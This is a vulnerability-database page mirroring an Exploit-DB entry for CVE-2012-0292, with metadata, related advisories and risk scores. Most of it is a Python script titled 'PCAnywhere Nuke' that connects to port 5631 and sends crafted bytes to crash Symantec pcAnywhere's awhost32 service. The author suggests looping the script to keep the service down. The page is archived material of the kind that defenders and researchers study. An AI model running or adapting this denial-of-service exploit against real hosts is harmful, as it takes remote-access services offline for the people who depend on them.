Lucene search
+L

pcAnywhere 12.5.0 build 463 - Denial of Service

🗓️ 17 Feb 2012 00:00:00Reported by Johnathan NormanType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 16 Views

Crashes PCAnywhere's awhost32 service using a python exploit designed for Denial of Service attacks.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2012-0292
8 Mar 201202:00
cve
cvelist
Cvelist
CVE-2012-0292
8 Mar 201202:00
cvelist
euvd
EUVD
EUVD-2012-0328
7 Oct 202500:30
euvd
kaspersky
Kaspersky
KLA10356 Multiple vulnerabilities in pcAnywhere
22 Feb 201200:00
kaspersky
nvd
NVD
CVE-2012-0292
8 Mar 201204:15
nvd
openvas
OpenVAS
Symantec pcAnywhere 'awhost32' RCE Vulnerability
9 Jul 201200:00
openvas
prion
Prion
Code injection
8 Mar 201204:15
prion
symantec
Symantec
Symantec pcAnywhere awhost32 Denial of Service
1 Mar 201208:00
symantec
nessus
Tenable Nessus
Symantec pcAnywhere awhost32 Denial of Service (SYM12-003)
5 Mar 201200:00
nessus
#!/usr/bin/python

'''
Exploit Title:  PCAnywhere Nuke
Date: 2/16/12
Author: Johnathan Norman  spoofy <at> exploitscience.org  or @spoofyroot
Version:  PCAnyWhere  (12.5.0 build 463) and below
Tested on: Windows
Description: The following code will crash the awhost32 service. It'll be respawned
so if you want to be a real  pain you'll need to loop this.. my inital impressions
are that controlling execuction will be a pain.
'''

import sys
import socket
import argparse


if len(sys.argv) != 2:
    print "[+] Usage: ./pcNuke.py <HOST>"
    sys.exit(1)
HOST = sys.argv[1]
PORT = 5631
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))


# HELLO!
s.send("\x00\x00\x00\x00")
buf = s.recv(1024)


# ACK!
s.send("\x6f\x06\xfe")
buf = s.recv(1024)


# Auth capability part 1
s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
# Auth capability part 2
s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Feb 2012 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 25
EPSS0.07091
16